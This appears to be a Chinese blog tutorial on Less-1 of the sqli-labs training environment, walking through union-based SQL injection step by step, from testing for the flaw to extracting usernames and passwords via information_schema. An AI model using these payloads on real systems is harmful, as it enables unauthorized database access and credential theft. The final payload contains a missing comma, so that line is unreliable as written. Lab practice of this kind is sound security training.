Sqli-lab:Less-1教程

本文详细描述了一种SQL注入攻击方法——联合注入,通过分析输入如何影响查询结果,逐步揭示数据库结构,包括爆破出数据库名、表名、字段名以及敏感信息如用户名和密码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

less-1:联合注入

判断是否有SQL注入漏洞

1,当输入Less-1/?id=1时会显示显示对应的Login name与Password,可以证明我们输入的内容是在数据库里面查询
在这里插入图片描述
2,判断SQL语句是否是拼接
a,当我们输入1’时会报错
在这里插入图片描述
b,当我们输入1'--+时不会报错,就可以使用联合查询的方式进行sql注入
在这里插入图片描述

联合注入

我们要了解有多少列可以用order by进行查询

在这里插入图片描述
在这里插入图片描述
在输入3的时候页面正常显示,输入4的时候页面访问错误。说明有三列

爆破在这三个列那个列是在页面显示的

在这里插入图片描述
从显示来看第2,3列里面数据是显示在页面的

爆破数据库名

在这里插入图片描述
输入?id=1'union select 1,database(),3--+显示出数据库名是security

爆破表

在数据库里面默认有一个库information_schema里面有所有表的信息。

输入?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+时会爆破出表名

爆破字段名

上一步我们获取了4张表,根据表名可以猜到用户的账户密码在users里面
在这里插入图片描述
输入?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+得到了两个敏感的字段,username和password

爆破用户名和密码

在这里插入图片描述
输入?id=-1' union select 1,2,group_concat(username,':'password) from users --+就可以得到对应的信息

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值